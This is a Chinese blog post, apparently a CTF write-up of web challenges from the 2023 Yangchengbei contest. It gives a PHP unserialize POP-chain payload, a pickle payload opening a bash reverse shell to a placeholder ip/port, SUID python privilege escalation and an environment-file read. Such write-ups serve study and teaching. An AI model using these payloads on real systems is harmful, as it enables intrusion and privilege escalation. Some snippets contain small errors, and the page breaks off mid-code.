<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 6.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-trophy-1.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-trophy-1.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.2.1/css/all.min.css" integrity="sha256-Z1K5uhUaJXA7Ll0XrZ/0JhX4lAtZFpT6jkKrEDT0drU=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"z1d10t.github.io","root":"/","images":"/images","scheme":"Gemini","darkmode":false,"version":"8.14.2","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":{"enable":true,"show_result":true,"style":"mac"},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.json","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js"></script>

    <meta name="description" content="2023羊城杯WEB WP与复现学习">
<meta property="og:type" content="article">
<meta property="og:title" content="2023羊城杯WEB WP与复现学习">
<meta property="og:url" content="https://z1d10t.github.io/post/3edff1a9.html">
<meta property="og:site_name" content="Z1d10tのBlog">
<meta property="og:description" content="2023羊城杯WEB WP与复现学习">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://z1d10t-blog.oss-cn-shenzhen.aliyuncs.com/img/blog1693623290570-7868b5b7-d2cd-4183-88c1-b7af0b623684.png">
<meta property="og:image" content="https://z1d10t-blog.oss-cn-shenzhen.aliyuncs.com/img/blog1693661431373-9a66c8fd-ce25-40a0-8847-bad7363150a5.png">
<meta property="og:image" content="https://z1d10t-blog.oss-cn-shenzhen.aliyuncs.com/img/blog1693660447816-3625b299-1051-4a75-abc6-1443251980ad.png">
<meta property="og:image" content="https://z1d10t-blog.oss-cn-shenzhen.aliyuncs.com/img/blog1694011985226-0e294a99-187a-45f7-9268-6a56df3e24ad.png">
<meta property="og:image" content="https://z1d10t-blog.oss-cn-shenzhen.aliyuncs.com/img/blog1694012734069-f27e4a64-739c-4798-bbba-e4a8545c51b6.png">
<meta property="og:image" content="https://z1d10t-blog.oss-cn-shenzhen.aliyuncs.com/img/blog1694094226089-5913781d-64aa-45ea-a2b2-59f67b604c93.jpeg">
<meta property="article:published_time" content="2023-09-04T13:14:41.000Z">
<meta property="article:modified_time" content="2023-09-07T14:57:45.458Z">
<meta property="article:author" content="Z1d10t">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://z1d10t-blog.oss-cn-shenzhen.aliyuncs.com/img/blog1693623290570-7868b5b7-d2cd-4183-88c1-b7af0b623684.png">


<link rel="canonical" href="https://z1d10t.github.io/post/3edff1a9.html">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://z1d10t.github.io/post/3edff1a9.html","path":"post/3edff1a9.html","title":"2023羊城杯WEB WP与复现学习"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>2023羊城杯WEB WP与复现学习 | Z1d10tのBlog</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Z1d10tのBlog</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description"> </p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-house fa-fw"></i>首页</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tag fa-fw"></i>标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-rectangle-list fa-fw"></i>分类</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>博主</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#WEB"><span class="nav-number">1.</span> <span class="nav-text">WEB</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#D0n%E2%80%99t-pl4y-g4m3"><span class="nav-number">1.1.</span> <span class="nav-text">D0n’t pl4y g4m3!!!</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Serpent"><span class="nav-number">1.2.</span> <span class="nav-text">Serpent</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ArkNights"><span class="nav-number">1.3.</span> <span class="nav-text">ArkNights</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%9D%9E%E9%A2%84%E6%9C%9F%E8%A7%A3"><span class="nav-number">1.3.1.</span> <span class="nav-text">非预期解</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%A2%84%E6%9C%9F%E8%A7%A3"><span class="nav-number">1.3.2.</span> <span class="nav-text">预期解</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ezyaml"><span class="nav-number">1.4.</span> <span class="nav-text">ezyaml</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Ez-java"><span class="nav-number">1.5.</span> <span class="nav-text">Ez_java</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Ez-web"><span class="nav-number">1.6.</span> <span class="nav-text">Ez_web</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Misc"><span class="nav-number">2.</span> <span class="nav-text">Misc</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#EZ-misc"><span class="nav-number">2.1.</span> <span class="nav-text">EZ_misc</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Z1d10t"
      src="https://z1d10t-blog.oss-cn-shenzhen.aliyuncs.com/img/blog1695400865185.png">
  <p class="site-author-name" itemprop="name">Z1d10t</p>
  <div class="site-description" itemprop="description">邪王真眼是最强的！</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">85</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">82</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
        <div class="back-to-top animated" role="button" aria-label="返回顶部">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://z1d10t.github.io/post/3edff1a9.html">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://z1d10t-blog.oss-cn-shenzhen.aliyuncs.com/img/blog1695400865185.png">
      <meta itemprop="name" content="Z1d10t">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Z1d10tのBlog">
      <meta itemprop="description" content="邪王真眼是最强的！">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="2023羊城杯WEB WP与复现学习 | Z1d10tのBlog">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          2023羊城杯WEB WP与复现学习
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2023-09-04 21:14:41" itemprop="dateCreated datePublished" datetime="2023-09-04T21:14:41+08:00">2023-09-04</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2023-09-07 22:57:45" itemprop="dateModified" datetime="2023-09-07T22:57:45+08:00">2023-09-07</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E5%90%84%E8%B5%9B%E4%BA%8BWP/" itemprop="url" rel="index"><span itemprop="name">各赛事WP</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <p>2023羊城杯WEB WP与复现学习</p>
<span id="more"></span>

<h1 id="WEB"><a href="#WEB" class="headerlink" title="WEB"></a>WEB</h1><h2 id="D0n’t-pl4y-g4m3"><a href="#D0n’t-pl4y-g4m3" class="headerlink" title="D0n’t pl4y g4m3!!!"></a>D0n’t pl4y g4m3!!!</h2><p>php 7.4.21源码泄露  之前东北电力大学举办的一个ctf比赛上出过类似题目</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/hint.zip</span><br></pre></td></tr></table></figure>

<p><img src="https://z1d10t-blog.oss-cn-shenzhen.aliyuncs.com/img/blog1693623290570-7868b5b7-d2cd-4183-88c1-b7af0b623684.png" alt="img"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag在/tmp/catcatf1ag.txt</span><br></pre></td></tr></table></figure>

<p>然后用源码泄露p0p.php</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class Pro&#123;</span><br><span class="line">    private $exp;</span><br><span class="line">    private $rce2;</span><br><span class="line"></span><br><span class="line">    public function __get($name)</span><br><span class="line">    &#123;</span><br><span class="line">        return $this-&gt;$rce2=$this-&gt;exp[$rce2];</span><br><span class="line">    &#125;</span><br><span class="line">    public  function __toString()</span><br><span class="line">    &#123;</span><br><span class="line">        call_user_func(&#x27;system&#x27;, &quot;cat /flag&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class Yang</span><br><span class="line">&#123;</span><br><span class="line">    public function __call($name, $ary)</span><br><span class="line">    &#123;</span><br><span class="line">        if ($this-&gt;key === true || $this-&gt;finish1-&gt;name) &#123;</span><br><span class="line">            if ($this-&gt;finish-&gt;finish) &#123;</span><br><span class="line">                call_user_func($this-&gt;now[$name], $ary[0]);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    public function ycb()</span><br><span class="line">    &#123;</span><br><span class="line">        $this-&gt;now = 0;</span><br><span class="line">        return $this-&gt;finish-&gt;finish;</span><br><span class="line">    &#125;</span><br><span class="line">    public function __wakeup()</span><br><span class="line">    &#123;</span><br><span class="line">        $this-&gt;key = True;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">class Cheng</span><br><span class="line">&#123;</span><br><span class="line">    private $finish;</span><br><span class="line">    public $name;</span><br><span class="line">    public function __get($value)</span><br><span class="line">    &#123;</span><br><span class="line"></span><br><span class="line">        return $this-&gt;$value = $this-&gt;name[$value];</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">class Bei</span><br><span class="line">&#123;</span><br><span class="line">    public function __destruct()</span><br><span class="line">    &#123;</span><br><span class="line">        if ($this-&gt;CTF-&gt;ycb()) &#123;</span><br><span class="line">            $this-&gt;fine-&gt;YCB1($this-&gt;rce, $this-&gt;rce1);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    public function __wakeup()</span><br><span class="line">    &#123;</span><br><span class="line">        $this-&gt;key = false;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function prohib($a)&#123;</span><br><span class="line">    $filter = &quot;/system|exec|passthru|shell_exec|popen|proc_open|pcntl_exec|eval|flag/i&quot;;</span><br><span class="line">    return preg_replace($filter,&#x27;&#x27;,$a);</span><br><span class="line">&#125;</span><br><span class="line">$a = $_POST[&quot;CTF&quot;];</span><br><span class="line">if(isset($a))&#123;</span><br><span class="line">    unserialize(prohib($a));</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>之后就是一个pop链</p>
<p>paylaod如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line">class Pro&#123;</span><br><span class="line">    private $exp;</span><br><span class="line">    private $rce2;&#125;</span><br><span class="line"></span><br><span class="line">class Yang&#123;</span><br><span class="line">    </span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class Cheng</span><br><span class="line">&#123;</span><br><span class="line">    private $finish;</span><br><span class="line">    public $name;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line">class Bei</span><br><span class="line">&#123;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line">$a = new Bei();</span><br><span class="line">$a-&gt;rce = &#x27;/tmp/catcatf1ag.txt&#x27;;</span><br><span class="line">$a-&gt;rce1=&#x27;/tmp/catcatf1ag.txt&#x27;;</span><br><span class="line">$a-&gt;CTF = new Yang();</span><br><span class="line">$a-&gt;CTF-&gt;finish-&gt;finish =1;</span><br><span class="line">$a-&gt;fine = new Yang();</span><br><span class="line">$a-&gt;fine-&gt;finish1-&gt;name=1;</span><br><span class="line">$a-&gt;fine-&gt;finish-&gt;finish=1;</span><br><span class="line">$a-&gt;fine-&gt;now=[&quot;YCB1&quot;=&gt;&quot;highlight_file&quot;];</span><br><span class="line">echo urlencode(serialize($a));</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>学到了新trick 这里也可以不用文件包含函数 直接双写绕过waf都可以</p>
<h2 id="Serpent"><a href="#Serpent" class="headerlink" title="Serpent"></a>Serpent</h2><p>flask伪造+python反序列化+提权</p>
<p>没怎么仔细好好学过python反序列化 在这里寄了</p>
<p>获得源码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">@app.route(&#x27;/verification&#x27;)</span><br><span class="line">def verification():</span><br><span class="line">    try:</span><br><span class="line">        attribute = session.get(&#x27;Attribute&#x27;)</span><br><span class="line">        if not isinstance(attribute, dict):</span><br><span class="line">            raise Exception</span><br><span class="line">    except Exception:</span><br><span class="line">        return &#x27;Hacker!!!&#x27;</span><br><span class="line">    if attribute.get(&#x27;name&#x27;) == &#x27;admin&#x27;:</span><br><span class="line">        if attribute.get(&#x27;admin&#x27;) == 1:</span><br><span class="line">            return secret</span><br><span class="line">        else:</span><br><span class="line">            return &quot;Don&#x27;t play tricks on me&quot;</span><br><span class="line">    else:</span><br><span class="line">        return &quot;You are a perfect stranger to me&quot;</span><br><span class="line"></span><br><span class="line">if __name__ == &#x27;__main__&#x27;:</span><br><span class="line">    app.run(&#x27;0.0.0.0&#x27;, port=80)</span><br></pre></td></tr></table></figure>

<p>一眼丁真 session伪造 直接解码session给了key的 <code>GWHTNrtE8JiVyR</code></p>
<p>之后访问<code>/src0de</code>路由再次拿到源码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">@app.route(&#x27;/ppppppppppick1e&#x27;)</span><br><span class="line">def ppppppppppick1e():</span><br><span class="line">    try:</span><br><span class="line">        username = &quot;admin&quot;</span><br><span class="line">        rsp = make_response(&quot;Hello, %s &quot; % username)</span><br><span class="line">        rsp.headers[&#x27;hint&#x27;] = &quot;Source in /src0de&quot;</span><br><span class="line">        pick1e = request.cookies.get(&#x27;pick1e&#x27;)</span><br><span class="line">        if pick1e is not None:</span><br><span class="line">            pick1e = base64.b64decode(pick1e)</span><br><span class="line">        else:</span><br><span class="line">            return rsp</span><br><span class="line">        if check(pick1e):</span><br><span class="line">            pick1e = pickle.loads(pick1e)</span><br><span class="line">            return &quot;Go for it!!!&quot;</span><br><span class="line">        else:</span><br><span class="line">            return &quot;No Way!!!&quot;</span><br><span class="line">    except Exception as e:</span><br><span class="line">        error_message = str(e)</span><br><span class="line">        return error_message</span><br><span class="line"></span><br><span class="line">    return rsp</span><br><span class="line"></span><br><span class="line">class GWHT():</span><br><span class="line">    def __init__(self):</span><br><span class="line">        pass</span><br><span class="line"></span><br><span class="line">if __name__ == &#x27;__main__&#x27;:</span><br><span class="line">    app.run(&#x27;0.0.0.0&#x27;, port=80)</span><br></pre></td></tr></table></figure>

<p>考察python反序列化 并且有waf 要bypass R</p>
<p>所以用o指令来绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">from flask import Flask</span><br><span class="line">import base64</span><br><span class="line">payload=b&#x27;&#x27;&#x27;(cos</span><br><span class="line">system</span><br><span class="line">S&#x27;bash -c &quot;bash -i &gt;&amp; /dev/tcp/ip/port &lt;&amp;1&quot;&#x27;</span><br><span class="line">o.&#x27;&#x27;&#x27;</span><br><span class="line">print(base64.b64encode(payload))</span><br></pre></td></tr></table></figure>

<p>或者用i指令来绕过 都是出自:<a target="_blank" rel="noopener" href="https://tttang.com/archive/1885/#toc_i">https://tttang.com/archive/1885/#toc_i</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">from flask import Flask</span><br><span class="line">import base64</span><br><span class="line">opcode=b&#x27;&#x27;&#x27;(S&#x27;whoami&#x27;</span><br><span class="line">ios</span><br><span class="line">system</span><br><span class="line">.&#x27;&#x27;&#x27;</span><br><span class="line">print(base64.b64encode(payload))</span><br></pre></td></tr></table></figure>

<p>反弹shell 发现还要提权 读不了flag</p>
<p><strong>因为这个题目python3.8存在suid 文件具有 SUID 权限，因此当普通用户运行它时，该程序会以文件所有者的权限来运行 所以我们可以提权</strong></p>
<p><code>python3.8 -c &quot;import os;os.execl(&#39;/bin/sh&#39;,&#39;sh&#39;,&#39;-p&#39;)&quot;</code> -c是命令行选项</p>
<p>或者更简单点<code>python3 -c &quot;print(open(&#39;/flag&#39;).read(0)&quot;</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">解释：</span><br><span class="line">&quot;import os;os.execl(&#x27;/bin/sh&#x27;,&#x27;sh&#x27;,&#x27;-p&#x27;)&quot;：这部分是实际的 Python 代码片段，它由两部分组成：</span><br><span class="line">import os：这行代码导入了 Python 中的 os 模块，该模块提供了与操作系统交互的功能。</span><br><span class="line">os.execl(&#x27;/bin/sh&#x27;, &#x27;sh&#x27;, &#x27;-p&#x27;)：这是要执行的 Python 代码。它使用 os.execl() 函数执行了一个系统命令。具体地说：</span><br><span class="line">&#x27;/bin/sh&#x27; 是要执行的程序的路径，即 Unix Shell 的路径。</span><br><span class="line">&#x27;sh&#x27; 是新程序的名称，通常是 Shell 的名称。</span><br><span class="line">&#x27;-p&#x27; 是传递给新程序的参数，这里表示以特权模式启动 Shell。</span><br></pre></td></tr></table></figure>

<p><img src="https://z1d10t-blog.oss-cn-shenzhen.aliyuncs.com/img/blog1693661431373-9a66c8fd-ce25-40a0-8847-bad7363150a5.png" alt="img"></p>
<h2 id="ArkNights"><a href="#ArkNights" class="headerlink" title="ArkNights"></a>ArkNights</h2><h3 id="非预期解"><a href="#非预期解" class="headerlink" title="非预期解"></a>非预期解</h3><p>非预期了payload:<code>/read?file=/proc/1/environ</code></p>
<p>读环境变量就有</p>
<p><img src="https://z1d10t-blog.oss-cn-shenzhen.aliyuncs.com/img/blog1693660447816-3625b299-1051-4a75-abc6-1443251980ad.png" alt="img"></p>
<h3 id="预期解"><a href="#预期解" class="headerlink" title="预期解"></a>预期解</h3><p>考点:</p>
<ul>
<li>通过&#x2F;proc&#x2F;self&#x2F;mem内存获取secretkey</li>
<li>python的变量污染导致render可以目录穿越</li>
<li>任意文件读取</li>
</ul>
<p>首先获得源码:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line">import uuid</span><br><span class="line">from flask import *</span><br><span class="line">from werkzeug.utils import *</span><br><span class="line">app = Flask(__name__)</span><br><span class="line">app.config[&#x27;SECRET_KEY&#x27;] =str(uuid.uuid4()).replace(&quot;-&quot;,&quot;*&quot;)+&quot;Boogipopisweak&quot;</span><br><span class="line">@app.route(&#x27;/&#x27;)</span><br><span class="line">def index():</span><br><span class="line">    name=request.args.get(&quot;name&quot;,&quot;name&quot;)</span><br><span class="line">    m1sery=[request.args.get(&quot;m1sery&quot;,&quot;Doctor.Boogipop&quot;)]</span><br><span class="line">    if(session.get(&quot;name&quot;)==&quot;Dr.Boog1pop&quot;):</span><br><span class="line">        blacklist=re.findall(&quot;/ba|sh|\\\\|\[|]|#|system|&#x27;|\&quot;/&quot;, name, re.IGNORECASE)</span><br><span class="line">        if blacklist:</span><br><span class="line">            return &quot;bad hacker no way&quot;</span><br><span class="line">        exec(f&#x27;for [&#123;name&#125;] in [&#123;m1sery&#125;]:print(&quot;strange?&quot;)&#x27;)</span><br><span class="line">    else:</span><br><span class="line">        session[&#x27;name&#x27;] = &quot;Doctor&quot;</span><br><span class="line">    return render_template(&quot;index.html&quot;,name=session.get(&quot;name&quot;))</span><br><span class="line">@app.route(&#x27;/read&#x27;)</span><br><span class="line">def read():</span><br><span class="line">        file = request.args.get(&#x27;file&#x27;)</span><br><span class="line">        fileblacklist=re.findall(&quot;/flag|fl|ag/&quot;,file, re.IGNORECASE)</span><br><span class="line">        if fileblacklist:</span><br><span class="line">            return &quot;bad hacker!&quot;</span><br><span class="line">        start=request.args.get(&quot;start&quot;,&quot;0&quot;)</span><br><span class="line">        end=request.args.get(&quot;end&quot;,&quot;0&quot;)</span><br><span class="line">        if start==&quot;0&quot; and end==&quot;0&quot;:</span><br><span class="line">            return open(file,&quot;rb&quot;).read()</span><br><span class="line">        else:</span><br><span class="line">            start,end=int(start),int(end)</span><br><span class="line">            f=open(file,&quot;rb&quot;)</span><br><span 